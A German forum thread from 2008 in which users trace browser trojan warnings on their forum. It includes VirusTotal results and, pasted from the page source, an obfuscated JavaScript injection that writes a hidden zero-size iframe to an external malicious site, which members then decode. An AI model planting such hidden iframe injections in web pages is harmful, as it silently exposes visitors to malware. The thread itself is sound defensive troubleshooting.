Seit Tagen immer mehr Trojaner warnungen hier...

aber es ist doch keine meldung eines virenschutzprogramms.

es geht eine windows-warnmeldung auf.
nix vom virenscanner.

hier zu hause hab ich auch firefox und adblock und daher ruhe.
nur auf der arbeit kann ich nix installieren oder so.
und es nervt wenn ich mal kurz was nachsehen will und dauernd kommt diese scheiß warnmeldung.

Komisch, auf Arbeit bekomm ich weder vom dortigen XP, Internetexplorer, noch Virenscanner eine Meldung.

Und der Laden sollte seine IT im Griff haben bei über 30000 Leut.
Mir is das echt rätselhaft und bin froh wenns neue Forum läuft

ich meinte mit "es geht ein fenster auf" die windows warnmeldung.
war wohl blöd ausgedrückt.

die firefox stick lösung werde ich morgen probieren.
k.a. inwieweit dies gesperrt ist.
aber ich glaube alle "zusatzlaufwerke" gehen nicht.

Ich habe hier keine Meldungen, weder vom AV noch vom Windows.

Krally: Kannst du bitte mal nachschauen was für ein AV auf deinem PC im Büro installiert ist? Ausserdem wäre es genial wenn du einen Screenshot der betreffenden Meldung machen könntest.

Falls du nicht weisst wie das geht:

Wenn die Meldung kommt, einfach die "Druck" Taste drücken. Dann Paint öffnen, Edit -> einfügen. Dann das Bild möglichst als .jpg abspeichern. Dann mal hier posten.

Ich denke nur so kommen wir in der Sache hier weiter.

Bei mir ist es vom Virenscanner,hab das aber auch erst seit einiger Zeit,weiß nicht genau wie lange,aber vor 1oder 2 Monaten hatte ich das auch noch nicht????

mach ich morgen..

ich hoffe das paint auf dem rechner ist.
ansonsten mach ich mit dem handy ein bild des monitors und der darstellung.

Mal bei Virustotal hoch geladen:

AhnLab-V3 2008.11.21.0 2008.11.24 -
AntiVir 7.9.0.35 2008.11.24 HTML/Crypted.Gen
Authentium 5.1.0.4 2008.11.24 -
Avast 4.8.1281.0 2008.11.23 -
AVG 8.0.0.199 2008.11.23 HTML/Framer.J
BitDefender 7.2 2008.11.24 -
CAT-QuickHeal 10.00 2008.11.24 -
ClamAV 0.94.1 2008.11.24 -
DrWeb 4.44.0.09170 2008.11.24 Trojan.DownLoader.35184
eSafe 7.0.17.0 2008.11.23 -
eTrust-Vet 31.6.6225 2008.11.24 -
Ewido 4.0 2008.11.23 -
F-Prot 4.4.4.56 2008.11.24 -
Fortinet 3.117.0.0 2008.11.24 JS/Psyme.ME
GData 19 2008.11.24 -
Ikarus T3.1.1.45.0 2008.11.24 -
K7AntiVirus 7.10.531 2008.11.22 -
Kaspersky 7.0.0.125 2008.11.24 -
McAfee 5443 2008.11.23 -
McAfee+Artemis 5443 2008.11.23 -
Microsoft 1.4104 2008.11.24 -
NOD32 3634 2008.11.24 -
Norman 5.80.02 2008.11.22 -
Panda 9.0.0.4 2008.11.23 -
PCTools 4.4.2.0 2008.11.23 -
Rising 21.05.00.00 2008.11.24 -
SecureWeb-Gateway 6.7.6 2008.11.24 Heuristic.Script.Crypted
Sophos 4.35.0 2008.11.24 -
Sunbelt 3.1.1823.2 2008.11.22 -
Symantec 10 2008.11.24 -
TheHacker 6.3.1.1.161 2008.11.24 -
TrendMicro 8.700.0.1004 2008.11.24 -
VBA32 3.12.8.9 2008.11.23 -
ViRobot 2008.11.18.1474 2008.11.18 -
VirusBuster 4.5.11.0 2008.11.23 -

Nach wie vor Antivir mit crypted.gen Virus... Suche gerade Google woran das liegen könnte

Was wurde da hochgeladen?

Gibts was neues zum neuen Forum?

Ich hab ihn!!!!

<script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860
%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C1
15%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C
112%2C58%2C47%2C47%2C108%2C111%2C103%2C105%2
C116%2C101%2C99%2C104%2C49%2C46%2C101%2C120%
C116%2C114%2C97%2C46%2C104%2C117%2C47%2C105%
2C99%2C101%2C95%2C101%2C110%2C95%2C99%2C108%
2C101%2C97%2C110%2C47%2C105%2C110%2C100%2C101
%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C11
9%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C3
4%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2
C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C10
2%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script>
<script language="JavaScript">
function JumpSelect() {if(document.forumjump.jumpid.options[document.forumjump.jumpid.selectedIndex].value != -1) document.forumjump.submit();}
</script>

Das ist im Quelltext drin!!!!

Dieser Kram ruft die Seite
http://logitech1.extra.hu/ice_en_clean/index.php auf!!

Es handelt sich also um keine Fehlermeldung, sondern um einen tatsächlichen HTML-Trojaner!!

Ist wohl nicht weiter schlimm, aber wie ist der Kram da rein gekommen?

Micha, fix it or let me fix it

edit by some: Riesenskript auf Seitenbreite gebracht

Ufff

Was ein Scheiss
Gute Frage wie das da hin kommt.
Aber ne Belohnung hast Dir schon verdient

Die vielen Zeichen da oben sagen mir nicht viel.
Wie eben am Telefon besprochen, Cris hat die Daten zur Hand

Jo, eben mit im telefoniert. Hat er jetzt auch nicht, aber wir telefonieren heute Abend (chris und ich) und lösen das Problem.

Das sind ASCII-Zeichen.
Diese werden dort im Script doppelt gewandelt!

Einmal mit unescape ( %28 ist z.B. ein "(" ) und dann von dezimal in ein String (Zeichenfolge), siehe: http://www.torsten-horn.de/techdocs/ascii.htm

Unten steht z.B. 105%2C114%2C, daraus wird mit unescape 105,114, und mit string.fromcharcode "ir"..

Wurde wohl benutzt um diese komische URL so gut wie möglich zu verschleiern.

Grüße
Miles

Wir sind nicht die einzigen mit dem Problem und phpkit!

http://forum.kaspersky.com/index.php?showtopic=62930

das ist ja schön zu hören, dass der fehler gefunden ist.

hier auf der arbeit hab ich norman anti virus.
mit xp und ie 7

firefox mit stick geht nicht.
bild der fehlermeldung hab ich gemacht, gebe ich heute abend an para zwecks hochladen weiter.

Firefox öffnet den Link einfach, bekommt wohl Antivir nicht mit!

Mit Firebug (Plugin für Firefox) sieht man schön, wie er den Link vom Frame aus öffnet!

Antivir findet den String Char Kram, aber irgendwie nicht im Firefox.

Grüße

Super Miles, wenn Ihr das heute Abend raus bekommt, dann seid Ihr echt die Helden!
Seit Monaten nervt mich die dämliche Meldung schon... Ob ich noch ohne leben kann??

@para
hast du meine bildschirm-hardcopy nicht bekommen?

----------------
wie siehts denn aus? bekommt ihr das weg?

Ich habs bekommen und weitergeleitet an Miles und Crislee

Weiss aber nicht ob die schon dazu kamen